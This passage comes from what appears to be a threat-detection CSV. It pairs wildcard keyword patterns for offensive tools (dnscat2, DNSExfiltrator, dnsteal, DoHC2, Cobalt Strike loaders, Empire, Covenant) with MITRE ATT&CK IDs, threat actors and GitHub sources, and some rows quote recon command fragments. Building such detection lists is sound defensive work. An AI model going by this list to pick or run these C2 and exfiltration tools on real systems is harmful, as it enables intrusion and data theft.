(C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,0,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnscat tcpcat*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,0,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnscat*,offensive_tool_keyword,dnscat,Welcome to dnscat2. a DNS tunnel that WON'T make you sick and kill you This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol. which is an effective tunnel out of almost every network.,T1071 - T1090 - T1571,TA0011,N/A,N/A,Data Exfiltration,https://github.com/iagox86/dnscat2,1,0,N/A,N/A,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnscat2*.tar.bz2*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnscat2-*.zip*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnscat2.*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnscat2.ps1*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dnscat2/*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnscat2-server*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnscat2-win32.exe*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnschef --fakeip 127.0.0.1 -q*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dnscmd . /enumrecords /zone *,greyware_tool_keyword,dnscmd,the actor gather information about the target environment,T1018 - T1049,TA0007 - TA0009,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*dnscmd . /enumzones*,greyware_tool_keyword,dnscmd,the actor gather information about the target environment,T1018 - T1049,TA0007 - TA0009,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*dnsenum*,offensive_tool_keyword,dnsenum,multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.,T1218 - T1018 - T1190 - T1590 - T1012,TA0002 - TA0007,N/A,N/A,Information Gathering,https://github.com/fwaeytens/dnsenum,1,1,N/A,N/A,6,521,133,2019-10-08T19:58:40Z,2014-01-10T14:47:09Z -*DNS-Enum-*-*.log*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*dnsexfiltrator.*,offensive_tool_keyword,DNSExfiltrator,DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.,T1041 - T1048,TA0010 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/Arno0x/DNSExfiltrator,1,1,N/A,10,8,792,189,2019-10-06T22:24:55Z,2017-12-20T13:58:09Z -*DNSExfiltratorLib*,offensive_tool_keyword,DNSExfiltrator,DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.,T1041 - T1048,TA0010 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/Arno0x/DNSExfiltrator,1,1,N/A,10,8,792,189,2019-10-06T22:24:55Z,2017-12-20T13:58:09Z -*DNSListener.py*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,1,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*dnslytics-get-rootdomains*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*dnsmastermind.rb*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnsmorph*,offensive_tool_keyword,dnsmorph,DNSMORPH is a domain name permutation engine. inspired by dnstwist. It is written in Go making for a compact and very fast tool. It robustly handles any domain or subdomain supplied and provides a number of configuration options to tune permutation runs.,T1568.002 - T1568.003 - T1568.001 - T1568.004,TA0009 - TA0011,N/A,N/A,Phishing,https://github.com/netevert/dnsmorph,1,1,N/A,N/A,3,241,41,2023-08-08T06:38:59Z,2018-02-20T19:13:35Z -*dnspayload.bin*,offensive_tool_keyword,cobaltstrike,Cobaltstrike payload generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dr0op/CrossNet-Beta,1,1,N/A,10,10,352,56,2022-07-18T06:23:16Z,2021-02-08T10:52:39Z -*DNS-Persist.git*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,1,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*dnsrecon -*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*dnsrecon*,offensive_tool_keyword,dnsrecon,DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early 2007. This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.,T1590 - T1590.001,TA0001 - TA0007,N/A,N/A,Information Gathering,https://github.com/darkoperator/dnsrecon,1,1,N/A,6,10,2336,516,2023-09-11T05:14:02Z,2010-12-16T03:25:49Z -*dnsrecon-zonetransfer*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*dnsteal.git*,offensive_tool_keyword,dnsteal,This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.,T1048.003 - T1568.002 - T1573.002,TA0010 - TA0002,N/A,N/A,Data Exfiltration,https://github.com/m57/dnsteal,1,1,N/A,3,10,1378,236,2022-02-03T11:04:49Z,2015-08-11T17:02:58Z -*dnsteal.py*,offensive_tool_keyword,dnsteal,This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.,T1048.003 - T1568.002 - T1573.002,TA0010 - TA0002,N/A,N/A,Data Exfiltration,https://github.com/m57/dnsteal,1,1,N/A,3,10,1378,236,2022-02-03T11:04:49Z,2015-08-11T17:02:58Z -*dnsteal-master*,offensive_tool_keyword,dnsteal,This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.,T1048.003 - T1568.002 - T1573.002,TA0010 - TA0002,N/A,N/A,Data Exfiltration,https://github.com/m57/dnsteal,1,1,N/A,3,10,1378,236,2022-02-03T11:04:49Z,2015-08-11T17:02:58Z -*dnstracer*,offensive_tool_keyword,DNSTracer,This is a python application that traces how a DNS query is performed from a client machine to the server.,T1556 - T1016 - T1046,TA0007 - TA0001,N/A,N/A,Sniffing & Spoofing,https://github.com/pcoder/DNSTracer,1,0,N/A,3,1,6,1,2011-11-11T22:06:48Z,2011-07-07T18:36:07Z -*dnstwist*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -*dnsx -silent -d * -w dns_worldlist.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dnsx -silent -d domains.txt -w jira*grafana*jenkins*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*do_attack(*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*do_bypassuac*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*do_pyinject*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*Do-AltShiftEsc*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-MS16135.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Do-AltShiftTab*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-MS16135.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*doc/extras/HACKING.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*docker * covenant*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*docker * --name elite *,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*docker * -t elite *,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*docker build -t rmg .*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*docker run */pacu:latest*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*docker run */usr/src/rde1*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*docker run */usr/src/rec2*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*docker run -p * spring4shell,offensive_tool_keyword,Spring4Shell,Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/reznok/Spring4Shell-POC,1,0,N/A,N/A,4,303,229,2022-08-04T18:26:18Z,2022-03-31T00:24:28Z -*docker run sitadel*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -*docker* donut *,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*docker-compose logs wiresocks*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,0,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -*DockerPwn*,offensive_tool_keyword,DockerPwn,Automation for abusing an exposed Docker TCP Socket. ,T1068 - T1528 - T1550,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/AbsoZed/DockerPwn.py,1,0,N/A,N/A,3,208,30,2022-12-08T03:17:35Z,2019-11-23T22:32:49Z -*DocPlz-main.zip*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*DocsPLZ\DocsPLZ.*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*DoEvil()*,offensive_tool_keyword,ETWEventSubscription,Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.,T1053.005 - T1546.003 - T1055.001,TA0004 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*Do-Exfiltration.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Doge-Loader*xor.go*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Loader by Golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/timwhitez/Doge-Loader,1,1,N/A,10,10,277,61,2021-04-22T08:24:59Z,2020-10-09T04:47:54Z -*DoHC2*BeaconConnector*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*DoHC2.exe*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*DoHC2.py*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*DoHC2Runner.*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*DoHC2Runner.exe*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*DoHC2Runner.pdb*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*DoHChannel.cs*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z 